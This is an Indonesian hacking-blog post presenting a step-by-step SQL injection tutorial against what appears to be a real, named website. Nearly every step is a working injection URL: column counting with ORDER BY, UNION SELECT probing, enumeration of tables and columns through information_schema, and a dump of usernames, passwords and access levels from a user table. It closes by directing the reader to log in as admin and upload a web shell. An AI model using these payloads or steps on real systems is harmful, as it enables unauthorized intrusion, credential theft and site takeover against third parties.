Filename | Tutorial SQL Injection PHP |
Permission | rwxr--r-- |
Author | Fell Sadiz |
Modified | 8/30/2012 12:30:00 AM |
Group | Hacking | Tutorial |
Actions | |
Navigation | / Home / Hacking / Tutorial / Tutorial SQL Injection PHP |
[+] 1
Kita tetapkan target terlebih dahulu
contoh: http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=159
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh: http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=159’
[+] 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
Nah.. Sekarang kita cek satu persatu.
contoh: http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+2--
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+3--
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+4--
sehingga muncul error atau hilang pesan error di angka 11...
misal: http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+11--
berarti yang kita ambil adalah sampai angka 10
menjadi http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+order+by+10--
[+] 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 11
maka:
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,8,9,10--
ok ,yg keluar angka 8
gunakan perintah version() untuk mengecek versi SQL yg diapakai masukan perintah tsb pada angka yg keluar tadi
contoh:
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,version(),9,10--
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut.
[+] 4
Untuk menampilkan semua isi dari table tsb
perintah group_concat(table_name) dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- dimasukan setelah angka terakhir
contoh:
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(table_name),9,10+from+information_schema.tables+where+table_schema=database()--
seumpama yg kita cari adalah “admin” , “user” , “tb_user” , dll..
[+] 5
Perintah group_concat(column_name) dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0x(hexa)-- dimasukan setelah angka terakhir
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(column_name),9,10+from+information_schema.columns+where+table_name=0x(hexa)--
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
Website yang di gunakan untuk konversi : http://www.string-functions.com/string-hex.aspx
contoh kata yg ingin di konversi yaitu tb-user maka akan menjadi 74625f75736572
[+] 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) dimasukan setelah angka terakhir
http://www.padang.cyber4rt.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x3a,level),9,10+from+tb_user--
ket: 0x3a sama dengan >>> :
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell.
0 Respons: